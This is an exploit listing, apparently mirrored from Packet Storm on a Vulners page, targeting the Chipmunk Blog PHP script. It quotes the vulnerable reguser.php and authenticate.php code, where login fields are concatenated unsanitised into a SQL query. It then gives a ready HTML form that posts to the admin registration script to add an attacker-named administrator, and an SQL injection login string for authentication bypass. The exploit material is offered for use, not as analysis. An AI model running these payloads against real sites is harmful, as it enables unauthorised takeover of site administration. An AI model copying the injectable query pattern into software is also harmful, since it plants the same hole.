Lucene search
K

Chipmunk Blog Add Admin Exploit

🗓️ 28 Jan 2009 00:00:00Reported by X0rType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 22 Views

Chipmunk Blog Add Admin Exploit, Vulnerability in reguser.php and authenticate.php allowing Admin Authentication Bypas

Code
`#########################################################################################  
[0x01] Informations:  
  
Script : Chipmunk Blog  
Download : http://www.chipmunk-scripts.com/blog/blog.zip  
Vulnerability : Add Admin Exploit\Auth Bypass  
Author : x0r  
Contact : [email protected] \ [email protected]  
Website : NULL  
  
#########################################################################################  
[0x02] Bug: \admin\reguser.php \admin\authenticate.php  
  
if (isset($_POST['submit'])) // name of submit button  
{  
$username=$_POST['username'];  
$password=$_POST['password'];  
$password=md5($password);  
$getadmin="SELECT * from bl_admin where username='$username' and  
password='$password'";  
$getadmin2=mysql_query($getadmin) or die("Could not get admin");  
  
  
#########################################################################################  
[0x03] Exploit:  
  
Add Admin:  
  
<html>  
<head>  
<title> Chipmunk Blog (reguser.php) Add Admin Exploit (html)</title>  
</head>  
<body>  
<form action=http://xxxxxxx/blog/admin/reguser.php method=post>  
Username:<br>  
<input type=text name='username' value='x0r' size="20"><br>  
Password:<br>  
<input type=text name='password' value='h4x0rz' size="20"><br>  
<input type="text" name="pass2" value='h4x0rz' size="15"><br>  
<input type=submit name='submit' value='submit'><br>  
</form>  
</body>  
</html>  
  
Exploit2: admin ' or ' 1=1--  
#########################################################################################  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation